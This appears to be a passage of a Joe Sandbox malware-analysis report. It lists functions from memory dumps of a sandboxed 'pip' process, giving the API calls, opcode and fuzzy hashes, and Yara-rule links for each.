Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 303cff13e09241807b55ff26bb03d8723b6b3b3495bb44b42c2ad8ab6c472c50
Instruction ID: df926d7e0579405fc36289d6400b8be7e155a18ce0eac29f74ce8d7c1b0f4370
Opcode Fuzzy Hash: 303cff13e09241807b55ff26bb03d8723b6b3b3495bb44b42c2ad8ab6c472c50
Instruction Fuzzy Hash: BB21FA75300109EF8B14DF49D890DAAB3BAFFC9314B248659F91987350C731EE16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06F80128 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

Tetq, xrefs: 06F80156
TJyq, xrefs: 06F8016D

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID: TJyq$Tetq
API String ID: 0-2584179919
Opcode ID: 64e58cbdca678b0db3105541453e7ad421979c1596d9ea3dcf2058a25a71ef24
Instruction ID: 3cd6a88f93539fb9ecdfe04304a9eef3effd9069b41eb009ca875b1af9afe70c
Opcode Fuzzy Hash: 64e58cbdca678b0db3105541453e7ad421979c1596d9ea3dcf2058a25a71ef24
Instruction Fuzzy Hash: DA11D571B041156BDB14BBA8D4547BFBBB6FF84310F504069E506AB390CEB1AD0987E2

Uniqueness

Uniqueness Score: -1.00%

Function 06F80048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

Tetq, xrefs: 06F80077
TJyq, xrefs: 06F8008F

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID: TJyq$Tetq
API String ID: 0-2584179919
Opcode ID: 3a253887e6f21f4afa4b8e1f1fea178648edf9c5b81880d19d4e8f04f1b2b231
Instruction ID: 76b158a35ddc17dadd2fdcb688215c29b32a1a2a600aaeabdeabdad511e90333
Opcode Fuzzy Hash: 3a253887e6f21f4afa4b8e1f1fea178648edf9c5b81880d19d4e8f04f1b2b231
Instruction Fuzzy Hash: 6A11B170B041156BDB14ABA894547BFBAE6FF88300F54006DE506AB380CEB5AE0987E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF8BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6CEF6890,?), ref: 6CEF8BDD
LeaveCriticalSection.KERNEL32(?), ref: 6CEF8C23

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 857ede3c54aee2491225119327bea6da53781b7bcfa733b2f8d479468427dac6
Instruction ID: 8ebd5a86a17409a2bf12033ec6a4e3e4523d3727133acdb963b3a1ca30b63cc9
Opcode Fuzzy Hash: 857ede3c54aee2491225119327bea6da53781b7bcfa733b2f8d479468427dac6
Instruction Fuzzy Hash: 1601BC72705104AFC754DFA9C8A099AF7A8FB99204710426AE955C7700DB32ED51C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0E2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 9c5ecacdef373687d13d48fd85768765f78fc273511a8b035c93d76d7cc57daa
Instruction ID: 5bd99829911d3a9e5e8cf2ae9098609dbe6e8716c80383b13e1ad50c736c49ab
Opcode Fuzzy Hash: 9c5ecacdef373687d13d48fd85768765f78fc273511a8b035c93d76d7cc57daa
Instruction Fuzzy Hash: D581E4F2A053408FEB209F64889175EBBF4BF41708F24897ED1998BB91D7B185089B93

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF7140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6CF12820: _malloc.LIBCMT ref: 6CF12871

std::tr1::_Xweak.LIBCPMT ref: 6CEF71D2

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: 16757adfda12122fd7689cba7d49c576f09570a8f2f291fbe8ce146634553b49
Instruction ID: 5e49b471ed92b54921cb00d7b666fe6cd16a0d73fd3ac72505d312895d4b39b6
Opcode Fuzzy Hash: 16757adfda12122fd7689cba7d49c576f09570a8f2f291fbe8ce146634553b49
Instruction Fuzzy Hash: 5431A5B5A0534A9FCB10CFA5C880AABB7F5FF49208F20865DE82597B41D731E905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 071909B0 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 07190A50

Memory Dump Source

Source File: 00000016.00000002.2941845742.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7190000_pip.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d4b966baf975e6854f166ee530d6106f2aa2f27c6227da2a3628f1bb6e2c8b74
Instruction ID: ca3b117063e8657ca75e019b9a8676314b40dfeb23a42eef3d3d8c42c4c69f9d
Opcode Fuzzy Hash: d4b966baf975e6854f166ee530d6106f2aa2f27c6227da2a3628f1bb6e2c8b74
Instruction Fuzzy Hash: CF2189B1800249DFCB10DFA9C844ADEBFF8EF49320F14846AE558AB251D735A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF525C3 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CF4CB3E,6CF49BD4,?,00000000,00000000,00000000,?,6CF4EA98,00000001,00000214), ref: 6CF52606

Part of subcall function 6CF4D7D8: __getptd_noexit.LIBCMT ref: 6CF4D7D8

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: f998304857ec19b5dcc149239f20d1a08b57bd8cef412cb38209e01403494f94
Instruction ID: 752faa0b8814f608c551da596f425b46f7292fe2e7b60dcfaddcb11420d59593
Opcode Fuzzy Hash: f998304857ec19b5dcc149239f20d1a08b57bd8cef412cb38209e01403494f94
Instruction Fuzzy Hash: 4501D8313022159BEB149E25CC68B6B3774BBA2768F544729EA65C79D1DB31D4208780

Uniqueness

Uniqueness Score: -1.00%

Function 071901B8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 07190A50

Memory Dump Source

Source File: 00000016.00000002.2941845742.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7190000_pip.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 11e345d78e7bb6670fbb32176cf78471e17fa00e53846f99fdc98988294fde06
Instruction ID: 401467c014ac16c25cfa313a441d3353b8aee96ee8236d645b4dbff70dede42c
Opcode Fuzzy Hash: 11e345d78e7bb6670fbb32176cf78471e17fa00e53846f99fdc98988294fde06
Instruction Fuzzy Hash: 0F1166B2800249CFCB20DF9AC444BEEBBF4EB48320F108429D528A7340D338A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07192668 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 071926C5

Memory Dump Source

Source File: 00000016.00000002.2941845742.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7190000_pip.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c32888b73a3ebb0513035fdcd1addb2cb662a57b4a0135795fa9f4903ef3212b
Instruction ID: c8a1c16ae85cd2c9456309af1f9261499f42b625d91bc005092778e9c41669ab
Opcode Fuzzy Hash: c32888b73a3ebb0513035fdcd1addb2cb662a57b4a0135795fa9f4903ef3212b
Instruction Fuzzy Hash: 471133B1C00248DFCB20DFAAD845BDEBFF8EB48320F24885AD518A7640C375A584CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07190308 Relevance: 1.5, APIs: 1, Instructions: 47threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 07191318

Memory Dump Source

Source File: 00000016.00000002.2941845742.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7190000_pip.jbxd

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 7f4cfe966c6dfd2e0c43a9af4c1a476bd72eadc2381070098e70b8a5b3c61421
Instruction ID: 1b3923426ffb063f5ebe28d96f84e14860e3f94bc4444382f309e0a877d8a4db
Opcode Fuzzy Hash: 7f4cfe966c6dfd2e0c43a9af4c1a476bd72eadc2381070098e70b8a5b3c61421
Instruction Fuzzy Hash: 3D1113B5810259DEDB20DF9AC94ABEEBFF4EB08320F108859E554AB280C3756544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

SysAllocString.OLEAUT32 ref: 6CF0EA8D

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 8ac8886b2993f835743bb25c09bf2fd8f28d51973a36b0b22e0814017a3ce9db
Instruction ID: 0ddd57b50cb29a346473fe5e743e1f1a65f16de923378ce66f2fab1ecc3b189b
Opcode Fuzzy Hash: 8ac8886b2993f835743bb25c09bf2fd8f28d51973a36b0b22e0814017a3ce9db
Instruction Fuzzy Hash: 10019271A05755EBD711CF54C901B9ABBF8FB09B24F11831AEC65A7B80D7B59900CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 07191F5C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 071926C5

Memory Dump Source

Source File: 00000016.00000002.2941845742.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7190000_pip.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ae8b59d3b293c0626555e5201cc308a81a33c5c604e2bd561a15dbce7c5c1c40
Instruction ID: 867527c85d8c5669a1dda97bbdaaaae0f178544cbf7219c82d047de20d36e657
Opcode Fuzzy Hash: ae8b59d3b293c0626555e5201cc308a81a33c5c604e2bd561a15dbce7c5c1c40
Instruction Fuzzy Hash: 271115B1C00348DFDB20DF9AD544BDEBBF8EB48320F148859D518A7650D375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 071912B0 Relevance: 1.5, APIs: 1, Instructions: 45threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 07191318

Memory Dump Source

Source File: 00000016.00000002.2941845742.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7190000_pip.jbxd

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8c7786de0c38a64a8de85529c2e8df4c320e3f5cfad49e64afd642b516e73d1b
Instruction ID: c6a8e0c396470858d63889da5b09545a00f18a77930ad4d5a3a1814b2455e293
Opcode Fuzzy Hash: 8c7786de0c38a64a8de85529c2e8df4c320e3f5cfad49e64afd642b516e73d1b
Instruction Fuzzy Hash: CB1116B5810399DEDB20CF99C94ABDEBFF4EB08320F14885AD554BB281D379A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6CF49D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CF4E8DC

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: H_prolog3_catch_malloc
String ID:
API String ID: 529455676-0
Opcode ID: 10ea02beb656fdea2168ed0b1e9f49a0d8b4e0d4f49f7251f96a58597cf1a364
Instruction ID: f5ae19b369eebc3027aad0b8fb31053dd7aff5f0d33bcb0afac14eabf038d8fa
Opcode Fuzzy Hash: 10ea02beb656fdea2168ed0b1e9f49a0d8b4e0d4f49f7251f96a58597cf1a364
Instruction Fuzzy Hash: 50D05E31A1420897CB41EB988505BAD7FA4AB41325F90D065E108BAB81DE718A1C8796

Uniqueness

Uniqueness Score: -1.00%

Function 6CF4A510 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMT ref: 6CF4A510

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction ID: 7ee2d86778860849886405b242f49021d20b189fc8f57c09d22daf18d3e690a1
Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction Fuzzy Hash: C2C09B351043089F8B04CF10F440CDE3B55AB54224710D125FC1C06B719B319575D560

Uniqueness

Uniqueness Score: -1.00%

Function 032ADC68 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908649519.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32a0000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8a79d3cb7a3009954595d4993a8118c5576ca37ef0fd47deb5942749179941
Instruction ID: 0d810ffa2dc6714b4fd82715e5aecca288bebe04eeb4f732258a5d76f5cbcc42
Opcode Fuzzy Hash: 7c8a79d3cb7a3009954595d4993a8118c5576ca37ef0fd47deb5942749179941
Instruction Fuzzy Hash: BCA1C174E10618CFDB14DFA9D994B9DBBB2BF49300F1480A9D509AB3A0DB71A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 018BD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2907850764.00000000018BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 018BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_18bd000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49837906e4f7c2061efad1ba8a6fcb3e0b695601d25e8d8c023aa00eb48d4a9b
Instruction ID: 10f8a0540dcdbe3bcaa75cb62ccccc5daad6305a827fc2bcce5beee2fde267bc
Opcode Fuzzy Hash: 49837906e4f7c2061efad1ba8a6fcb3e0b695601d25e8d8c023aa00eb48d4a9b
Instruction Fuzzy Hash: 1E2136B1504204EFDB05DF88D8C0B66BF65FB8831CF24C668E9098B356C33AD506CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 06F82516 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58f81a8390551d9d6f27ddb2088a78d4403d460c4e2e619d12afe6f7ed52c8f
Instruction ID: 3ab9fca9f4732b1dd15964d9d7aa41b70a58f2394090d2749a37ac0c571a707a
Opcode Fuzzy Hash: e58f81a8390551d9d6f27ddb2088a78d4403d460c4e2e619d12afe6f7ed52c8f
Instruction Fuzzy Hash: 6D214BB1A102058FCB58DF68D8A0AAEB7A2EF84310F158555D4169B288DB74FD42CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 0317DCD8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5708256fb906dedc16ebae66e5ad150019a9785f833e79c06a9ed4d4cfd18f41
Instruction ID: 14f390d0348cf59d24c87f73f5c72d7aec7ba5aed5ab384cfd669fdfac5c559d
Opcode Fuzzy Hash: 5708256fb906dedc16ebae66e5ad150019a9785f833e79c06a9ed4d4cfd18f41
Instruction Fuzzy Hash: 8A21F5B1504248DFDB05DF14E9C0B26BBB9FF8C714F28C5A9E9094B285C336D846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0317DDC0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7dfdbb04c7db481ce3b6be0b0f1a41620ccdef750f2d6db1a3eb76429079bd
Instruction ID: f1ab44fbc93cca23eb0712406870707dadf548a70f2eb47f239b9f8768a1faf3
Opcode Fuzzy Hash: 2f7dfdbb04c7db481ce3b6be0b0f1a41620ccdef750f2d6db1a3eb76429079bd
Instruction Fuzzy Hash: EF21F5B1504248DFDB06DF14E980B26BB79FF9C314F28C969E9090B246C736D456C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 0317D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1febf66d66ad27ec85ab6f3fb50e223824847a4b289a093fb3d3713bc46f8220
Instruction ID: 603fe0818a336b32d5a86caa2f4c9ee5c2997e3b9e8238b0f03c9e1ea7a1cd06
Opcode Fuzzy Hash: 1febf66d66ad27ec85ab6f3fb50e223824847a4b289a093fb3d3713bc46f8220
Instruction Fuzzy Hash: A221F275604248DFDB14DF14E980B26BBB5FF8C314F28C9ADE90A4B246C33AD447CA61

Uniqueness

Uniqueness Score: -1.00%

Function 032AD9F0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908649519.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_32a0000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a30431a6e2a6f7f488705dc999f6fb816bbbbdebf624eda41159e1283d03c557
Instruction ID: a42a231f6878be529662e5920fa57e1c3e259eac188020b74d58eeb225d4053b
Opcode Fuzzy Hash: a30431a6e2a6f7f488705dc999f6fb816bbbbdebf624eda41159e1283d03c557
Instruction Fuzzy Hash: 8C2103B4E1460ADFCB04DFADC590AAEBBF1BF49300F1484A9D415A7361EB749A84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0317D898 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2908083244.000000000317D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0317D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_317d000_pip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94766e728213b24ac451a9b847788cbc050deb235d12c45bedcdf42d358b9122
Instruction ID: b77d4c52766b32bb58385c21f3919b9e20522c33f7d9b930e8b6798129503a0a
Opcode Fuzzy Hash: 94766e728213b24ac451a9b847788cbc050deb235d12c45bedcdf42d358b9122
